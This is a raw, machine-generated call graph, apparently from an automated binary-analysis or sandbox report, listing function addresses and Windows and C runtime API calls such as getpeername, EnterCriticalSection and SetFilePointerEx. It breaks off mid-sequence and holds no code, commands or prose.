calls 101772->101791 101775 7ffd92c19c6e 101777 7ffd92c19cb2 101775->101777 101778 7ffd92c19c92 101775->101778 101775->101791 101776 7ffd92c19f08 101780 7ffd92c19cd7 101777->101780 101781 7ffd92c19cb7 101777->101781 101808 7ffd92c26f90 53 API calls 2 library calls 101778->101808 101785 7ffd92c19d01 101780->101785 101786 7ffd92c19d14 101780->101786 101809 7ffd92c26f90 53 API calls 2 library calls 101781->101809 101810 7ffd92c26f90 53 API calls 2 library calls 101785->101810 101786->101791 101811 7ffd92c26f90 53 API calls 2 library calls 101786->101811 101787 7ffd92c18790 70 API calls 101787->101791 101790 7ffd92c22320 61 API calls 101790->101791 101791->101772 101791->101776 101791->101787 101791->101790 101792 7ffd92c26f90 53 API calls 101791->101792 101806 7ffd92c281f0 10 API calls _except1 101791->101806 101812 7ffd92c177e0 53 API calls 101791->101812 101813 7ffd92c36260 57 API calls 101791->101813 101792->101791 101794 7ffd92c19084 101793->101794 101795 7ffd92c2649b 101793->101795 101794->101766 101794->101769 101795->101794 101814 7ffd92c279a0 101795->101814 101796 7ffd92c264b3 101797 7ffd92c26556 101796->101797 101799 7ffd92c264be 101796->101799 101838 7ffd92c26d50 8 API calls _except1 101797->101838 101799->101794 101800 7ffd92c26526 101799->101800 101819 7ffd92c53790 101799->101819 101837 7ffd92c26d50 8 API calls _except1 101800->101837 101802 7ffd92c26532 101803 7ffd92c1d530 2 API calls 101802->101803 101803->101794 101806->101791 101807->101775 101808->101791 101809->101791 101810->101791 101811->101791 101812->101791 101813->101791 101815 7ffd92c279c3 101814->101815 101816 7ffd92c279d5 101814->101816 101815->101796 101817 7ffd92c27a52 101816->101817 101839 7ffd92c26f90 53 API calls 2 library calls 101816->101839 101817->101796 101820 7ffd92c537c2 101819->101820 101823 7ffd92c53919 101819->101823 101822 7ffd92c537f0 getpeername 101820->101822 101820->101823 101821 7ffd92c08950 _except1 8 API calls 101824 7ffd92c53970 101821->101824 101825 7ffd92c538a3 101822->101825 101826 7ffd92c5386f WSAGetLastError 101822->101826 101823->101821 101824->101799 101827 7ffd92c27d50 20 API calls 101825->101827 101840 7ffd92c11a70 27 API calls strrchr 101826->101840 101833 7ffd92c538c1 101827->101833 101829 7ffd92c5388c 101841 7ffd92c26f90 53 API calls 2 library calls 101829->101841 101830 7ffd92c538a1 101832 7ffd92c54e50 61 API calls 101830->101832 101832->101823 101833->101830 101842 7ffd92c11a70 27 API calls strrchr 101833->101842 101835 7ffd92c538f1 101843 7ffd92c26f90 53 API calls 2 library calls 101835->101843 101837->101802 101838->101794 101839->101817 101840->101829 101841->101830 101842->101835 101843->101830 101844 7ffd92c27620 101845 7ffd92c27650 101844->101845 101846 7ffd92c2765b 101844->101846 101847 7ffd92c27665 101846->101847 101875 7ffd92c28ba0 55 API calls 101846->101875 101847->101845 101856 7ffd92c28780 101847->101856 101850 7ffd92c276a4 101850->101845 101870 7ffd92c26160 101850->101870 101852 7ffd92c27708 101853 7ffd92c2772d 101852->101853 101876 7ffd92c35fa0 QueryPerformanceCounter GetTickCount 101852->101876 101877 7ffd92c22c80 53 API calls 101853->101877 101862 7ffd92c287d0 101856->101862 101857 7ffd92c1d530 2 API calls 101857->101862 101858 7ffd92c28a50 101861 7ffd92c08950 _except1 8 API calls 101858->101861 101859 7ffd92c288d7 WSASetLastError 101859->101862 101860 7ffd92c281f0 10 API calls 101860->101862 101864 7ffd92c28b7e 101861->101864 101862->101857 101862->101858 101862->101859 101862->101860 101863 7ffd92c28b32 101862->101863 101865 7ffd92c28a45 101862->101865 101867 7ffd92c27080 53 API calls 101862->101867 101869 7ffd92c28320 55 API calls 101862->101869 101879 7ffd92c26f90 53 API calls 2 library calls 101863->101879 101864->101850 101865->101858 101878 7ffd92c26f90 53 API calls 2 library calls 101865->101878 101867->101862 101869->101862 101871 7ffd92c26182 101870->101871 101872 7ffd92c261f5 101870->101872 101873 7ffd92c261d5 101871->101873 101874 7ffd92c53790 63 API calls 101871->101874 101872->101852 101873->101852 101874->101871 101875->101847 101876->101853 101877->101845 101878->101858 101879->101858 101880 7ffd92c195e0 101882 7ffd92c192f0 101880->101882 101881 7ffd92c19354 101885 7ffd92c19366 101881->101885 101886 7ffd92c19459 101881->101886 101882->101881 101883 7ffd92c18dfc 101882->101883 101919 7ffd92c2fa4d 101882->101919 101975 7ffd92c2f940 101882->101975 102032 7ffd92c2fa44 101882->102032 101913 7ffd92c18c30 101883->101913 102092 7ffd92c281f0 10 API calls _except1 101883->102092 101884 7ffd92c1a900 55 API calls 101884->101913 101890 7ffd92c19370 101885->101890 101891 7ffd92c19404 101885->101891 101886->101883 102090 7ffd92c2c8c0 53 API calls 101886->102090 101889 7ffd92c19f08 101890->101883 101897 7ffd92c18790 70 API calls 101890->101897 101891->101883 102089 7ffd92c35fa0 QueryPerformanceCounter GetTickCount 101891->102089 101892 7ffd92c19c6e 101895 7ffd92c19cb2 101892->101895 101896 7ffd92c19c92 101892->101896 101892->101913 101899 7ffd92c19cd7 101895->101899 101900 7ffd92c19cb7 101895->101900 102093 7ffd92c26f90 53 API calls 2 library calls 101896->102093 101897->101883 101905 7ffd92c19d01 101899->101905 101906 7ffd92c19d14 101899->101906 102094 7ffd92c26f90 53 API calls 2 library calls 101900->102094 101902 7ffd92c19480 101909 7ffd92c18790 70 API calls 101902->101909 102095 7ffd92c26f90 53 API calls 2 library calls 101905->102095 101906->101913 102096 7ffd92c26f90 53 API calls 2 library calls 101906->102096 101912 7ffd92c194a6 101909->101912 101910 7ffd92c18790 70 API calls 101910->101913 101911 7ffd92c22320 61 API calls 101911->101913 101912->101883 102091 7ffd92c2bcb0 56 API calls 101912->102091 101913->101884 101913->101889 101913->101910 101913->101911 101915 7ffd92c26f90 53 API calls 101913->101915 102088 7ffd92c281f0 10 API calls _except1 101913->102088 102097 7ffd92c177e0 53 API calls 101913->102097 102098 7ffd92c36260 57 API calls 101913->102098 101915->101913 101920 7ffd92c2fa5d 101919->101920 101922 7ffd92c2fa9a 101920->101922 102177 7ffd92c15f20 19 API calls 101920->102177 101926 7ffd92c2fc12 101922->101926 101930 7ffd92c2faeb 101922->101930 101974 7ffd92c2fbba 101922->101974 102180 7ffd92c34710 92 API calls _vfwprintf_l 101922->102180 101923 7ffd92c08950 _except1 8 API calls 101925 7ffd92c302aa 101923->101925 101925->101881 101926->101930 101926->101974 102181 7ffd92c34710 92 API calls _vfwprintf_l 101926->102181 101928 7ffd92c2fb48 101933 7ffd92c2fbaa 101928->101933 101928->101974 102179 7ffd92c15f20 19 API calls 101928->102179 101930->101928 101930->101974 102178 7ffd92c15f20 19 API calls 101930->102178 101933->101974 102099 7ffd92c31200 101933->102099 101934 7ffd92c2fd24 101936 7ffd92c2fd6b 101934->101936 101938 7ffd92c2fd8b 101934->101938 101946 7ffd92c2feba 101934->101946 101935 7ffd92c2fde4 102183 7ffd92c26f90 53 API calls 2 library calls 101935->102183 102182 7ffd92c15f20 19 API calls 101936->102182 101938->101974 102107 7ffd92c15920 101938->102107 101939 7ffd92c2fdfd 101944 7ffd92c2fe9e 101939->101944 101947 7ffd92c2fe5e 101939->101947 101940 7ffd92c2fcdd 101940->101934 101940->101935 101940->101939 101940->101947 101940->101974 102185 7ffd92c26f90 53 API calls 2 library calls 101944->102185 101945 7ffd92c2feff 102187 7ffd92c15f20 19 API calls 101945->102187 101946->101938 101946->101945 101949 7ffd92c2ff1f 101946->101949 101947->101934 101951 7ffd92c2fe85 101947->101951 102186 7ffd92c15f20 19 API calls 101949->102186 102184 7ffd92c26f90 53 API calls 2 library calls 101951->102184 101955 7ffd92c2ffd4 101957 7ffd92c30018 101955->101957 101955->101974 102188 7ffd92c15f20 19 API calls 101955->102188 101958 7ffd92c15920 19 API calls 101957->101958 101957->101974 101959 7ffd92c301bc 101958->101959 101959->101974 102119 7ffd92c31c70 101959->102119 101962 7ffd92c3023b 101963 7ffd92c30264 101962->101963 101967 7ffd92c302b6 101962->101967 101970 7ffd92c3038c SimpleString::operator= 101962->101970 101962->101974 102189 7ffd92c26f90 53 API calls 2 library calls 101963->102189 101965 7ffd92c303b1 101965->101974 102133 7ffd92c31450 101965->102133 101967->101970 101967->101974 102190 7ffd92c15ff0 19 API calls 101967->102190 101969 7ffd92c303ea 101969->101974 102191 7ffd92c36260 57 API calls 101969->102191 101970->101974 102129 7ffd92c30600 101970->102129 101972 7ffd92c30434 101973 7ffd92c27080 53 API calls 101972->101973 101972->101974 101973->101974 101974->101923 102218 7ffd92c32900 101975->102218 101977 7ffd92c08950 _except1 8 API calls 101978 7ffd92c302aa 101977->101978 101978->101881 101979 7ffd92c2f99a 101981 7ffd92c2fa9a 101979->101981 102031 7ffd92c2fbba 101979->102031 102228 7ffd92c15f20 19 API calls 101979->102228 101983 7ffd92c2fc12 101981->101983 101987 7ffd92c2faeb 101981->101987 101981->102031 102231 7ffd92c34710 92 API calls _vfwprintf_l 101981->102231 101983->101987 101983->102031 102232 7ffd92c34710 92 API calls _vfwprintf_l 101983->102232 101985 7ffd92c2fb48 101990 7ffd92c2fbaa 101985->101990 101985->102031 102230 7ffd92c15f20 19 API calls 101985->102230 101987->101985 101987->102031 102229 7ffd92c15f20 19 API calls 101987->102229 101988 7ffd92c31200 53 API calls 101997 7ffd92c2fcdd 101988->101997 101990->101988 101990->102031 101991 7ffd92c2fd24 101993 7ffd92c2fd6b 101991->101993 101995 7ffd92c2fd8b 101991->101995 102003 7ffd92c2feba 101991->102003 101992 7ffd92c2fde4 102234 7ffd92c26f90 53 API calls 2 library calls 101992->102234 102233 7ffd92c15f20 19 API calls 101993->102233 101998 7ffd92c15920 19 API calls 101995->101998 101995->102031 101996 7ffd92c2fdfd 102001 7ffd92c2fe9e 101996->102001 102004 7ffd92c2fe5e 101996->102004 101997->101991 101997->101992 101997->101996 101997->102004 101997->102031 102000 7ffd92c2ffbb 101998->102000 102007 7ffd92c34030 19 API calls 102000->102007 102000->102031 102236 7ffd92c26f90 53 API calls 2 library calls 102001->102236 102002 7ffd92c2feff 102238 7ffd92c15f20 19 API calls 102002->102238 102003->101995 102003->102002 102006 7ffd92c2ff1f 102003->102006 102004->101991 102008 7ffd92c2fe85 102004->102008 102237 7ffd92c15f20 19 API calls 102006->102237 102012 7ffd92c2ffd4 102007->102012 102235 7ffd92c26f90 53 API calls 2 library calls 102008->102235 102014 7ffd92c30018 102012->102014 102012->102031 102239 7ffd92c15f20 19 API calls 102012->102239 102015 7ffd92c15920 19 API calls 102014->102015 102014->102031 102016 7ffd92c301bc 102015->102016 102017 7ffd92c31c70 54 API calls 102016->102017 102016->102031 102019 7ffd92c3023b 102017->102019 102018 7ffd92c30600 19 API calls 102022 7ffd92c303b1 102018->102022 102020 7ffd92c30264 102019->102020 102024 7ffd92c302b6 102019->102024 102027 7ffd92c3038c SimpleString::operator= 102019->102027 102019->102031 102240 7ffd92c26f90 53 API calls 2 library calls 102020->102240 102023 7ffd92c31450 62 API calls 102022->102023 102022->102031 102026 7ffd92c303ea 102023->102026 102024->102027 102024->102031 102241 7ffd92c15ff0 19 API calls 102024->102241 102026->102031 102242 7ffd92c36260 57 API calls 102026->102242 102027->102018 102027->102031 102029 7ffd92c30434 102030 7ffd92c27080 53 API calls 102029->102030 102029->102031 102030->102031 102031->101977 102033 7ffd92c2fa5d 102032->102033 102035 7ffd92c2fa9a 102033->102035 102246 7ffd92c15f20 19 API calls 102033->102246 102039 7ffd92c2fc12 102035->102039 102043 7ffd92c2faeb 102035->102043 102087 7ffd92c2fbba 102035->102087 102249 7ffd92c34710 92 API calls _vfwprintf_l 102035->102249 102036 7ffd92c08950 _except1 8 API calls 102038 7ffd92c302aa 102036->102038 102038->101881 102039->102043 102039->102087 102250 7ffd92c34710 92 API calls _vfwprintf_l 102039->102250 102041 7ffd92c2fb48 102046 7ffd92c2fbaa 102041->102046 102041->102087 102248 7ffd92c15f20 19 API calls 102041->102248 102043->102041 102043->102087 102247 7ffd92c15f20 19 API calls 102043->102247 102044 7ffd92c31200 53 API calls 102053 7ffd92c2fcdd 102044->102053 102046->102044 102046->102087 102047 7ffd92c2fd24 102049 7ffd92c2fd6b 102047->102049 102051 7ffd92c2fd8b 102047->102051 102059 7ffd92c2feba 102047->102059 102048 7ffd92c2fde4 102252 7ffd92c26f90 53 API calls 2 library calls 102048->102252 102251 7ffd92c15f20 19 API calls 102049->102251 102054 7ffd92c15920 19 API calls 102051->102054 102051->102087 102052 7ffd92c2fdfd 102057 7ffd92c2fe9e 102052->102057 102060 7ffd92c2fe5e 102052->102060 102053->102047 102053->102048 102053->102052 102053->102060 102053->102087 102056 7ffd92c2ffbb 102054->102056 102063 7ffd92c34030 19 API calls 102056->102063 102056->102087 102254 7ffd92c26f90 53 API calls 2 library calls 102057->102254 102058 7ffd92c2feff 102256 7ffd92c15f20 19 API calls 102058->102256 102059->102051 102059->102058 102062 7ffd92c2ff1f 102059->102062 102060->102047 102064 7ffd92c2fe85 102060->102064 102255 7ffd92c15f20 19 API calls 102062->102255 102068 7ffd92c2ffd4 102063->102068 102253 7ffd92c26f90 53 API calls 2 library calls 102064->102253 102070 7ffd92c30018 102068->102070 102068->102087 102257 7ffd92c15f20 19 API calls 102068->102257 102071 7ffd92c15920 19 API calls 102070->102071 102070->102087 102072 7ffd92c301bc 102071->102072 102073 7ffd92c31c70 54 API calls 102072->102073 102072->102087 102075 7ffd92c3023b 102073->102075 102074 7ffd92c30600 19 API calls 102078 7ffd92c303b1 102074->102078 102076 7ffd92c30264 102075->102076 102080 7ffd92c302b6 102075->102080 102083 7ffd92c3038c SimpleString::operator= 102075->102083 102075->102087 102258 7ffd92c26f90 53 API calls 2 library calls 102076->102258 102079 7ffd92c31450 62 API calls 102078->102079 102078->102087 102082 7ffd92c303ea 102079->102082 102080->102083 102080->102087 102259 7ffd92c15ff0 19 API calls 102080->102259 102082->102087 102260 7ffd92c36260 57 API calls 102082->102260 102083->102074 102083->102087 102085 7ffd92c30434 102086 7ffd92c27080 53 API calls 102085->102086 102085->102087 102086->102087 102087->102036 102088->101913 102089->101883 102090->101902 102091->101883 102092->101892 102093->101913 102094->101913 102095->101913 102096->101913 102097->101913 102098->101913 102100 7ffd92c3129f 102099->102100 102104 7ffd92c31240 102099->102104 102192 7ffd92c10fb0 8 API calls memcpy_s 102100->102192 102102 7ffd92c31266 102102->101940 102103 7ffd92c31245 102103->102102 102194 7ffd92c26f90 53 API calls 2 library calls 102103->102194 102104->102102 102104->102103 102104->102104 102193 7ffd92c0ec30 19 API calls 102104->102193 102195 7ffd92c15e70 102107->102195 102109 7ffd92c1593d 102109->101974 102110 7ffd92c34030 102109->102110 102111 7ffd92c34080 102110->102111 102112 7ffd92c3421c SimpleString::operator= 102110->102112 102111->102112 102115 7ffd92c3408d 102111->102115 102113 7ffd92c15920 19 API calls 102112->102113 102114 7ffd92c34205 102112->102114 102113->102114 102114->101955 102115->102114 102199 7ffd92c4f020 8 API calls _except1 102115->102199 102117 7ffd92c3413f SimpleString::operator= 102117->102114 102118 7ffd92c15920 19 API calls 102117->102118 102118->102114 102123 7ffd92c31c9b __std_type_info_compare 102119->102123 102120 7ffd92c31ee5 102120->101962 102121 7ffd92c31e62 102121->102120 102122 7ffd92c15920 19 API calls 102121->102122 102122->102120 102123->102120 102123->102121 102200 7ffd92c1c3e0 54 API calls 3 library calls 102123->102200 102125 7ffd92c31d8d 102125->102121 102125->102125 102126 7ffd92c31e79 102125->102126 102127 7ffd92c15920 19 API calls 102125->102127 102128 7ffd92c27080 53 API calls 102126->102128 102127->102125 102128->102121 102130 7ffd92c3062c strrchr 102129->102130 102131 7ffd92c30904 102130->102131 102132 7ffd92c15920 19 API calls 102130->102132 102131->101965 102132->102130 102134 7ffd92c3148f 102133->102134 102137 7ffd92c3182f 102133->102137 102135 7ffd92c3164f 102134->102135 102136 7ffd92c314a3 102134->102136 102139 7ffd92c31658 102135->102139 102141 7ffd92c316b6 102135->102141 102142 7ffd92c3150e 102136->102142 102145 7ffd92c314a9 102136->102145 102140 7ffd92c15920 19 API calls 102137->102140 102168 7ffd92c3188b 102137->102168 102138 7ffd92c314fc 102146 7ffd92c08950 _except1 8 API calls 102138->102146 102139->102138 102143 7ffd92c30ac0 60 API calls 102139->102143 102140->102168 102148 7ffd92c316fb 102141->102148 102154 7ffd92c15920 19 API calls 102141->102154 102151 7ffd92c15920 19 API calls 102142->102151 102160 7ffd92c3156a 102142->102160 102147 7ffd92c31698 102143->102147 102144 7ffd92c15920 19 API calls 102144->102148 102145->102138 102149 7ffd92c30ac0 60 API calls 102145->102149 102150 7ffd92c31ba1 102146->102150 102152 7ffd92c316a5 102147->102152 102166 7ffd92c31501 102147->102166 102148->102138 102148->102144 102159 7ffd92c31733 102148->102159 102153 7ffd92c314e7 102149->102153 102150->101969 102151->102160 102211 7ffd92c26f90 53 API calls 2 library calls 102152->102211 102155 7ffd92c314f0 102153->102155 102153->102166 102154->102148 102209 7ffd92c26f90 53 API calls 2 library calls 102155->102209 102159->102138 102201 7ffd92c30ac0 102159->102201 102160->102138 102162 7ffd92c30ac0 60 API calls 102160->102162 102164 7ffd92c3162c 102162->102164 102163 7ffd92c31811 102163->102166 102167 7ffd92c3181b 102163->102167 102164->102166 102169 7ffd92c31632 102164->102169 102165 7ffd92c30ac0 60 API calls 102170 7ffd92c31b56 102165->102170 102215 7ffd92c2ca40 55 API calls 102166->102215 102212 7ffd92c26f90 53 API calls 2 library calls 102167->102212 102168->102138 102176 7ffd92c31997 SimpleString::operator= 102168->102176 102213 7ffd92c15ff0 19 API calls 102168->102213 102210 7ffd92c26f90 53 API calls 2 library calls 102169->102210 102170->102166 102173 7ffd92c31b5c 102170->102173 102214 7ffd92c26f90 53 API calls 2 library calls 102173->102214 102176->102138 102176->102165 102177->101922 102178->101928 102179->101933 102180->101926 102181->101930 102182->101938 102183->101974 102184->101974 102185->101974 102186->101938 102187->101938 102188->101957 102189->101974 102190->101970 102191->101972 102192->102104 102193->102103 102194->102102 102198 7ffd92c16a00 19 API calls 2 library calls 102195->102198 102197 7ffd92c15e95 102197->102109 102198->102197 102199->102117 102200->102125 102205 7ffd92c30af5 memcpy_s 102201->102205 102202 7ffd92c271b0 60 API calls 102203 7ffd92c30bdb 102202->102203 102204 7ffd92c30b6d 102203->102204 102216 7ffd92c26eb0 52 API calls 102203->102216 102204->102163 102205->102202 102205->102204 102207 7ffd92c30c10 102207->102204 102217 7ffd92c26eb0 52 API calls 102207->102217 102209->102138 102210->102138 102211->102138 102212->102138 102213->102176 102214->102138 102215->102138 102216->102207 102217->102204 102219 7ffd92c3291e 102218->102219 102220 7ffd92c32a87 102219->102220 102225 7ffd92c32a55 102219->102225 102226 7ffd92c329be strrchr memcpy_s 102219->102226 102221 7ffd92c32ab7 102220->102221 102222 7ffd92c32aee 102220->102222 102244 7ffd92c15f20 19 API calls 102221->102244 102245 7ffd92c15f20 19 API calls 102222->102245 102225->101979 102226->102225 102243 7ffd92c15f20 19 API calls 102226->102243 102228->101981 102229->101985 102230->101990 102231->101983 102232->101987 102233->101995 102234->102031 102235->102031 102236->102031 102237->101995 102238->101995 102239->102014 102240->102031 102241->102027 102242->102029 102243->102225 102244->102225 102245->102225 102246->102035 102247->102041 102248->102046 102249->102039 102250->102043 102251->102051 102252->102087 102253->102087 102254->102087 102255->102051 102256->102051 102257->102070 102258->102087 102259->102083 102260->102085 102261 7ffd92cc3ba0 102274 7ffd92ca4710 EnterCriticalSection 102261->102274 102263 7ffd92cc3bae 102264 7ffd92cc3bef 102263->102264 102265 7ffd92cc3c71 102263->102265 102269 7ffd92cc3c17 102263->102269 102275 7ffd92cc3670 102264->102275 102265->102269 102271 7ffd92cc3cd2 EnterCriticalSection 102265->102271 102268 7ffd92cc3da2 102280 7ffd92ca47a0 LeaveCriticalSection 102269->102280 102270 7ffd92cc3bf4 102270->102269 102279 7ffd92cc3a10 EnterCriticalSection 102270->102279 102271->102269 102272 7ffd92cc3cf0 LeaveCriticalSection 102271->102272 102272->102265 102274->102263 102276 7ffd92cc3698 Concurrency::details::ContextBase::GetWorkQueueIdentity Concurrency::details::_Scheduler::_Scheduler type_info::_name_internal_method 102275->102276 102278 7ffd92cc36b6 type_info::_name_internal_method __crt_unique_heap_ptr 102276->102278 102281 7ffd92cbed60 6 API calls __create_locale 102276->102281 102278->102270 102279->102269 102280->102268 102281->102278 102282 7ffd92c95a60 102284 7ffd92c95a73 strrchr 102282->102284 102283 7ffd92c95c15 RtlAllocateHeap 102287 7ffd92c95af4 memcpy_s _wtempnam 102283->102287 102284->102283 102284->102287 102286 7ffd92c95e73 102288 7ffd92ca47a0 LeaveCriticalSection 102287->102288 102288->102286 102289 7ffd92ca5f22 102290 7ffd92ca5f2f std::_Debug_message 102289->102290 102293 7ffd92ca62a0 LeaveCriticalSection Concurrency::details::ContextBase::GetWorkQueueIdentity 102290->102293 102292 7ffd92ca5f43 102293->102292 102294 7ffd92bfae30 102295 7ffd92bfae60 102294->102295 102300 7ffd92c01080 102295->102300 102297 7ffd92bfae6f 102298 7ffd92bfaea0 102297->102298 102310 7ffd92bfa360 102297->102310 102301 7ffd92c010c0 102300->102301 102305 7ffd92c0109a 102300->102305 102302 7ffd92c010ce 102301->102302 102304 7ffd92c00a00 64 API calls 102301->102304 102302->102297 102303 7ffd92c010ba 102303->102297 102304->102302 102305->102303 102320 7ffd92bebe20 19 API calls 2 library calls 102305->102320 102307 7ffd92c01123 102308 7ffd92c69dd0 std::_Xinvalid_argument 2 API calls 102307->102308 102309 7ffd92c01134 102308->102309 102311 7ffd92bfa393 102310->102311 102312 7ffd92bfef70 52 API calls 102311->102312 102319 7ffd92bfa3eb 102311->102319 102314 7ffd92bfa3b6 102312->102314 102313 7ffd92c08950 _except1 8 API calls 102315 7ffd92bfa459 102313->102315 102316 7ffd92bfa3d6 102314->102316 102314->102319 102325 7ffd92c9ca70 51 API calls 3 library calls 102314->102325 102315->102298 102316->102319 102321 7ffd92c9a550 102316->102321 102319->102313 102320->102307 102322 7ffd92c9a566 102321->102322 102324 7ffd92c9a5c8 102322->102324 102326 7ffd92cb3920 102322->102326 102324->102319 102325->102316 102327 7ffd92cb3935 _mbsset_s Concurrency::details::_Scheduler::_Scheduler 102326->102327 102330 7ffd92cb2b30 102327->102330 102329 7ffd92cb3954 102329->102324 102331 7ffd92cb2b48 __crt_scoped_stack_ptr 102330->102331 102332 7ffd92cb2c0b Concurrency::details::ContextBase::GetWorkQueueIdentity 102331->102332 102333 7ffd92cb2bb1 __ExceptionPtrDestroy 102331->102333 102334 7ffd92c91b90 Concurrency::details::ContextBase::GetWorkQueueIdentity EnterCriticalSection 102332->102334 102354 7ffd92c915e0 19 API calls 3 library calls 102333->102354 102335 7ffd92cb2c26 102334->102335 102341 7ffd92cb2cc0 102335->102341 102338 7ffd92cb2c36 Concurrency::details::ContextBase::GetWorkQueueIdentity 102355 7ffd92c91bd0 LeaveCriticalSection Concurrency::details::ContextBase::GetWorkQueueIdentity Concurrency::details::_Scheduler::_Scheduler 102338->102355 102339 7ffd92cb2c02 102339->102329 102342 7ffd92cb2cde Concurrency::details::ContextBase::GetWorkQueueIdentity 102341->102342 102343 7ffd92cb2d45 __ExceptionPtrDestroy 102342->102343 102345 7ffd92cb2da8 Concurrency::details::ContextBase::GetWorkQueueIdentity _fread_nolock 102342->102345 102359 7ffd92c915e0 19 API calls 3 library calls 102343->102359 102356 7ffd92cb5950 102345->102356 102347 7ffd92cb2e01 Concurrency::details::ContextBase::GetWorkQueueIdentity _fread_nolock std::_Fiopen 102348 7ffd92cb2f06 102347->102348 102351 7ffd92cb2d9c Concurrency::details::ContextBase::GetWorkQueueIdentity __ExceptionPtrDestroy 102347->102351 102352 7ffd92cb2f25 Concurrency::details::ContextBase::GetWorkQueueIdentity _fread_nolock std::_Fiopen 102347->102352 102360 7ffd92cb35b0 24 API calls 4 library calls 102348->102360 102350 7ffd92cb2f20 102350->102351 102351->102338 102352->102351 102361 7ffd92cb3290 23 API calls 3 library calls 102352->102361 102354->102339 102355->102339 102362 7ffd92cb53b0 102356->102362 102358 7ffd92cb597f 102358->102347 102359->102351 102360->102350 102361->102351 102363 7ffd92cb5423 102362->102363 102364 7ffd92cb53d8 __ExceptionPtrDestroy std::_Fiopen 102362->102364 102368 7ffd92cb5523 102363->102368 102369 7ffd92cb54a2 __ExceptionPtrDestroy std::_Fiopen 102363->102369 102364->102358 102365 7ffd92cb563e 102376 7ffd92cc3a10 EnterCriticalSection 102365->102376 102367 7ffd92cb564a 102371 7ffd92cb568b __ExceptionPtrDestroy std::_Fiopen 102367->102371 102377 7ffd92cb5760 102367->102377 102368->102365 102373 7ffd92cb55bd __ExceptionPtrDestroy std::_Fiopen 102368->102373 102381 7ffd92c915e0 19 API calls 3 library calls 102369->102381 102383 7ffd92cc3b60 LeaveCriticalSection 102371->102383 102382 7ffd92c915e0 19 API calls 3 library calls 102373->102382 102376->102367 102378 7ffd92cb5780 std::_Fiopen 102377->102378 102380 7ffd92cb578d __ExceptionPtrDestroy 102378->102380 102384 7ffd92cb5890 SetFilePointerEx 102378->102384 102380->102371 102381->102364 102382->102364 102383->102364 102385 7ffd92cb58c6 GetLastError 102384->102385 102386 7ffd92cb58d8 std::_Fiopen 102384->102386 102385->102386 102386->102380 102387 7ffd92bf78b0 102416 7ffd92bf5f90 102387->102416 102417 7ffd92c04450 12 API calls 102416->102417 102418 7ffd92bf5fe2 102417->102418 102474 7ffd92befe10 102418->102474 102423 7ffd92beeaa0 80 API calls 102424 7ffd92bf600a 102423->102424 102475 7ffd92c04450 12 API calls 102474->102475 102476 7ffd92befe84 102475->102476 102635 7ffd92bee9a0 102476->102635 102478 7ffd92befe91 102479 7ffd92beeaa0 80 API calls 102478->102479 102485 7ffd92befe9e 102479->102485 102480 7ffd92c04450 12 API calls 102530 7ffd92bf040f delete 102480->102530 102481 7ffd92c0ae10 __std_fs_code_page 3 API calls 102482 7ffd92beff3d 102481->102482 102484 7ffd92bec1f0 21 API calls 102482->102484 102483 7ffd92be96b0 17 API calls 102486 7ffd92bf05f1 102483->102486 102487 7ffd92beff59 102484->102487 102485->102481 102506 7ffd92bf0509 102485->102506 102488 7ffd92bf0614 delete 102486->102488 102490 7ffd92be99c0 _Receive_impl 8 API calls 102486->102490 102648 7ffd92c01e80 102487->102648 102492 7ffd92be96b0 17 API calls 102488->102492 102490->102488 102496 7ffd92bf064f 102492->102496 102493 7ffd92bed610 24 API calls 102497 7ffd92bf06f0 102493->102497 102494 7ffd92be96b0 17 API calls 102495 7ffd92beff8b 102494->102495 102503 7ffd92beffa4 delete 102495->102503 102716 7ffd92c01430 8 API calls 3 library calls 102495->102716 102498 7ffd92bf066c delete 102496->102498 102499 7ffd92be99c0 _Receive_impl 8 API calls 102496->102499 102501 7ffd92c08950 _except1 8 API calls 102498->102501 102499->102498 102502 7ffd92bf06a3 102501->102502 102531 7ffd92bf0700 102502->102531 102505 7ffd92bee060 22 API calls 102503->102505 102503->102506 102507 7ffd92bf06c4 102503->102507 102509 7ffd92c0ae10 __std_fs_code_page 3 API calls 102503->102509 102510 7ffd92bf06d4 102503->102510 102511 7ffd92bec1f0 21 API calls 102503->102511 102512 7ffd92bf0364 102503->102512 102515 7ffd92be96b0 17 API calls 102503->102515 102519 7ffd92c01430 8 API calls 102503->102519 102524 7ffd92be99c0 _Receive_impl 8 API calls 102503->102524 102665 7ffd92c01aa0 102503->102665 102684 7ffd92bec9e0 102503->102684 102688 7ffd92beda60 102503->102688 102505->102503 102506->102480 102718 7ffd92bed610 102507->102718 102509->102503 102726 7ffd92bed520 19 API calls 2 library calls 102510->102726 102511->102503 102514 7ffd92c08cf0 new 4 API calls 102512->102514 102518 7ffd92bf0380 102514->102518 102515->102503 102516 7ffd92bf06dc 102516->102493 102520 7ffd92bf03a5 102518->102520 102521 7ffd92bf0394 102518->102521 102519->102503 102523 7ffd92be96b0 17 API calls 102520->102523 102717 7ffd92be9f60 17 API calls 3 library calls 102521->102717 102525 7ffd92bf03a3 102523->102525 102524->102503 102527 7ffd92be96b0 17 API calls 102525->102527 102528 7ffd92bf03ec 102527->102528 102529 7ffd92be99c0 _Receive_impl 8 API calls 102528->102529 102528->102530 102529->102530 102530->102483 102532 7ffd92bf09a5 102531->102532 102533 7ffd92bf0762 102531->102533 102856 7ffd92be9fe0 10 API calls std::_Xinvalid_argument 102532->102856 102535 7ffd92c08cf0 new 4 API calls 102533->102535 102536 7ffd92bf0774 102535->102536 102538 7ffd92bf07c0 102536->102538 102539 7ffd92bf09a0 102536->102539 102542 7ffd92bf078a 102536->102542 102541 7ffd92c07e50 4 API calls 102538->102541 102540 7ffd92be9d50 Concurrency::cancel_current_task 2 API calls 102539->102540 102540->102532 102541->102542 102543 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 102542->102543 102545 7ffd92bf0849 102543->102545 102544 7ffd92c0a5e0 std::_Lockit::~_Lockit 2 API calls 102546 7ffd92bf0880 102544->102546 102545->102544 102547 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 102546->102547 102548 7ffd92bf08af 102547->102548 102549 7ffd92c0a5e0 std::_Lockit::~_Lockit 2 API calls 102548->102549 102550 7ffd92bf08e6 102549->102550 102551 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 102550->102551 102553 7ffd92bf090a 102551->102553 102552 7ffd92c0a5e0 std::_Lockit::~_Lockit 2 API calls 102554 7ffd92bf0941 102552->102554 102553->102552 102838 7ffd92c02360 102554->102838 102557 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 102558 7ffd92bf0964 102557->102558 102559 7ffd92c0a5e0 std::_Lockit::~_Lockit 2 API calls 102558->102559 102560 7ffd92bf0976 102559->102560 102561 